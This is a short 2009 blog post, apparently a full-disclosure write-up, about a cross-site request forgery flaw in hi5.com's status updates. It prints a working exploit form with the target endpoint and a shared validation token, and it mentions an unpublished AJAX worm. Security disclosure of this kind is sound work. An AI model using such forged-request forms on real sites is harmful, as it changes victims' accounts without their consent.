2009-05-09 19:05:00

Its that time again, for me to rant on about poor web security by giving full disclosure.

hi5.com is some generic, childish social networking site that is extremely popular around the world, about Alexa #15 worldwide.

I was dicking with this site and found that the status message is updated by AJAX, and had a validation token that is the same for every user, and only changes every day at midnight.

I smelled CSRF.

So, I put together This CSRF Demo (do not click unless you want your status changed to 'This is a CSRF demonstration by humanbagel.com') to test it.

It worked.

A simple CSRF exploit, source code is:

<form action="http://hi5.com/friend/profile/editScrapbookTopicAjax.do" method="post">
<input type="hidden" name="editorId" value="topic">
<input type="hidden" name="js" value="aLy1t5zU0Ywg">
<input type="hidden" name="source" value="profile">
<input type="hidden" name="topic" value="This is a CSRF demonstration by humanbagel.com">
</form>

Simple CSRF.
There are far worse CSRF exploits on the site, including a nice AJAX worm I wrote, but I may include that data in a later post.

I reported the issue, they never fixed it, I report it.

Here is the demo (do not click unless you want your status changed to 'This is a CSRF demonstration by humanbagel.com')